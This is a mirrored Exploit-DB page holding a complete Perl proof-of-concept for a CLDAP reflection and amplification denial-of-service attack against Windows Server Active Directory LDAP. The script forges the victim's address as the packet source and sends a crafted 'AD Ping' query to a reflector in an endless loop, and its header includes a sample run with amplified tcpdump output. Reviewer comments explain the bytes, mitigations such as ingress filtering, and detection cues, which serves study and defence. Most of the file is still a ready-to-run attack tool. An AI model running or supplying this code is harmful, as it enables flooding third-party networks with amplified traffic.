Microsoft Windows Server 2008/2012 – LDAP RootDSE Netlogon Denial of Service

  • 作者: Todor Donev
    日期: 2016-11-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40703/
  • #!/usr/bin/perl
    #
    #MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon 
    #(CLDAP "AD Ping") query reflection DoS PoC
    #
    #Copyright 2016 (c) Todor Donev
    #Varna, Bulgaria
    #todor.donev@gmail.com
    #https://www.ethical-hacker.org/
    #https://www.facebook.com/ethicalhackerorg
    #http://pastebin.com/u/hackerscommunity 
    #
    #MS Windows Server 2016 [NOT TESTED !!!]
    # 
    #Description:
    #The attacker sends a simple query to a vulnerable reflector 
    #supporting the Connectionless LDAP service (CLDAP) and using 
    #address spoofing makes it appear to originate from the intended 
    #victim. The CLDAP service responds to the spoofed address, 
    #sending unwanted network traffic to the attacker’s intended target.
    # 
    #Amplification techniques allow bad actors to intensify the size 
    #of their attacks, because the responses generated by the LDAP 
    #servers are much larger than the attacker’s queries. In this case, 
    #the LDAP service responses are capable of reaching very high 
    #bandwidth and we have seen an average amplification factor of 
    #46x and a peak of 55x.
    #
    #
    #Disclaimer:
    #This or previous program is for Educational purpose ONLY. Do not 
    #use it without permission. The usual disclaimer applies, especially 
    #the fact that Todor Donev is not liable for any damages caused by 
    #direct or indirect use of the information or functionality provided 
    #by these programs. The author or any Internet provider bears NO 
    #responsibility for content or misuse of these programs or any 
    #derivatives thereof. By using these programs you accept the fact
    #that any damage (dataloss, system crash, system compromise, etc.) 
    #caused by the use of these programs is not Todor Donev's 
    #responsibility.
    #
    #Use at your own risk and educational
    #purpose ONLY!
    #
    #See also, UDP-based Amplification Attacks:
    #https://www.us-cert.gov/ncas/alerts/TA14-017A
    #
    #
    ## perl cldapdrdos.pl 192.168.1.112 192.168.1.146
    #[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
    #[ ======
    #[ Usg: cldapdrdos.pl <ldap server> <target> <port>
    #[ Default port: 389
    #[ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
    #[ ======
    #[ <todor.donev@gmail.com> Todor Donev
    #[ Facebook: https://www.facebook.com/ethicalhackerorg
    #[ Website: https://www.ethical-hacker.org/
    #[ Sending CLDAP "AD Ping" packets..
    #^C
    ## tcpdump -i eth0 -c4 port 389
    #tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    #listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
    #00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
    #00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL...
    #00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
    #00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL...
    #4 packets captured
    #6 packets received by filter
    #0 packets dropped by kernel
    #
    #
    #
    
    # NOTE(review): no `use strict;` / `use warnings;` — every variable below is
    # an undeclared-under-strict lexical, and the numeric use of $port (the
    # range check) would warn on non-numeric input if warnings were enabled.
    # Net::RawIP builds the IP header itself (the source address is set by hand
    # below), so this needs raw-socket privilege — the sample run in the header
    # uses a root prompt; confirm on the platform in use.
    use Net::RawIP;
    
    # Banner and usage text; it mirrors the header comment and does no validation.
    print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
    print "[ ======\n";
    print "[ Usg: $0 <ldap server> <target> <port>\n";
    print "[ Default port: 389\n";
    print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
    print "[ ======\n";
    print "[ <todor.donev\@gmail.com> Todor Donev\n";
    print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
    print "[ Website: https://www.ethical-hacker.org/\n";
    
    # Positional arguments: the CLDAP reflector, the address that will be written
    # into the IP source field (i.e. the forged "victim" address), and the
    # reflector's UDP port.  Neither address is validated or checked for
    # presence; a missing argument leaves the variable undef and is only
    # noticed when Net::RawIP tries to use it.
    my $cldap = $ARGV[0];
    my $target= $ARGV[1];
    # `||` (not `//`) means a port of "0" also falls back to 389.
    my $port= $ARGV[2] || '389';
    
    # Only the numeric range is checked.  A non-numeric string compares as 0
    # here and is therefore rejected; a fractional value such as "389.5" is not.
    die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
    
    # The 57-byte CLDAP request (it shows up as "UDP, length 57" in the header's
    # tcpdump capture, against 2315-byte responses — the amplification the
    # header describes).  The bytes read as a BER-encoded LDAP searchRequest:
    # "\x30\x25" outer SEQUENCE, "\x02\x01\x01" messageID 1, "\x63\x20" the
    # searchRequest, an empty base object (RootDSE) with base scope, a
    # "\x87\x0b" present filter on "objectclass", and a trailing request for
    # the "Netlogon" attribute — the "AD Ping" the header refers to.  Exact
    # field-by-field decoding is not verified here; treat it as a reading, not
    # a spec.
    my $query= "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
    $query.= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
    $query.= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
    $query.= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
    $query.= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
    $query.= "\x65\x74\x6c\x6f\x67\x6f\x6e";
     
    # Indirect-object syntax (`new Class(...)`); `Net::RawIP->new(...)` is the
    # conventional form.  `or die` carries no message, so a failed raw-socket
    # open (typically a privilege problem) dies silently.
    my $sock =new Net::RawIP({ udp => {} }) or die;
    print "[ Sending CLDAP \"AD Ping\" packets..\n";
    # `while ()` is an unconditional loop; it runs until the process is killed
    # (the header's sample run ends with ^C).
    while () {
    # 400 ms between packets, i.e. roughly 2.5 requests/s from this one sender.
    select(undef, undef, undef, 0.40); # Sleep 400 milliseconds
    # saddr is the forged source: the reflector's replies go to $target, not to
    # this host.  That is the whole reflection mechanism and also where it is
    # broken: networks that drop packets with forged source addresses (ingress
    # filtering / BCP 38, the TA14-017A reference in the header) stop the
    # request at the sender's edge, and a CLDAP service that is not reachable
    # over UDP/389 from untrusted networks cannot act as a reflector.
    # Detection-wise, the request uses a fixed UDP source port (31337) and the
    # victim sees UDP/389 responses for which it never sent a request.
    $sock->set({ip =>{ saddr=> $target, daddr => $cldap},
     udp =>{ source => 31337, dest=> $port, data => $query} });
    # Return value of send is not checked; send failures are silent.
    $sock->send;
    }